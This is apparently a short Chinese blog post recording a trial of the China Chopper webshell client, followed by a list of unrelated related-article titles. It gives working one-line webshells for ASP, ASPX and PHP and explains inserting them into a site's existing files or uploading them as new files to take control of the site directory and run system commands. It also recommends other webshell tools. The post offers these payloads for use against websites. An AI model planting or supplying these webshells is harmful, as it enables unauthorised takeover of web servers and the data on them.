2018-11-08 中國菜刀小試記錄(windows環境)
一. 簡介:
往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄並可執行一些web賬號所有許可權的系統命令,進入後滲透階段。
傳說中的官方網站:http://maicaidao.co/ 。下載的時候發現是2014年的版本。。。
測試完官方的中國菜刀後,從Cracer的Cracer安全工具包v7版中拿了一個相對較新的,但是發現百度上找到的菜刀都有後門,並且中國菜刀的這些一句話木馬很容易就被防毒軟體查殺了,所以推薦兩款更好的kali下的工具:webacoo、Weevely 。
二. 記錄:
asp的一句話是: <%eval request("xxx")%>
aspx的一句話是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句話是:<?php @eval($_POST['xxx']);?>
我們可以直接將這些語句插入到網站上的某個asp/aspx/php檔案上,或者直接建立一個新的檔案,在裡面寫入這些語句,然後把檔案上傳到網站上即可。
使用起來非常簡單,如下圖:
相關文章
- Windows環境下ELK簡單搭建記錄Windows
- Golang框架Beego在Windows環境下小試牛刀Golang框架Windows
- 測試環境匯出至開發環境過程記錄 expdp、impdp開發環境
- windows下目錄傳送到unix環境Windows
- Windows配置Delve的測試環境Windows
- Windows建立Cucumber和Ruby測試環境Windows
- MAC上Flutter環境搭建記錄MacFlutter
- MacOS Monterey 配置 PHP 環境記錄MacPHP
- 搭建rust開發環境-記錄Rust開發環境
- windows11 下搭建 Docker 開發環境記錄(少踩坑版)WindowsDocker開發環境
- windows環境下Django環境搭建WindowsDjango
- 手把手教你搭建Windows環境微信小程式的本地測試伺服器Windows微信小程式伺服器
- PHP Windows環境PHPWindows
- 配置開發環境、生成環境、測試環境開發環境
- Windows環境下的Nginx環境搭建WindowsNginx
- oracle11gR2 RAC 環境測試修改節點VIP的測試操作記錄Oracle
- Xamarin 學習筆記 - 配置環境(Windows & iOS)筆記WindowsiOS
- Spark 環境問題記錄和解決方法Spark
- 【記錄】WSL 下搭建前端開發環境前端開發環境
- XenServer虛擬化環境安裝記錄Server
- Windows 環境下 Python 環境安裝WindowsPython
- moblin開發環境試裝記事開發環境
- Windows環境下嘗試安裝並配置PHP PEARWindowsPHP
- windows 配置JAVA環境WindowsJava
- Flutter環境搭建(Windows)FlutterWindows
- Windows配置java環境WindowsJava
- go windows 環境搭建GoWindows
- git windows 環境搭建GitWindows
- 記-Windows環境下Prometheus+alertmanager+windows_exporter+mtail監控部署WindowsPrometheusExportAI
- [原創]CI持續整合系統環境---部署Gitlab環境完整記錄Gitlab
- 《Flask Web開發》讀書筆記【Windows環境】FlaskWeb筆記Windows
- Docker環境編譯時的錯誤記錄Docker編譯
- Centos下Nodejs+npm環境-部署記錄CentOSNodeJSNPM
- CentOS大資料實驗環境更改記錄CentOS大資料
- linux下使用者操作記錄審計環境的部署記錄Linux
- kafka學習筆記1:測試環境搭建Kafka筆記
- Xcode配置測試環境和線上環境XCode
- 中國菜刀使用(實戰正確姿勢)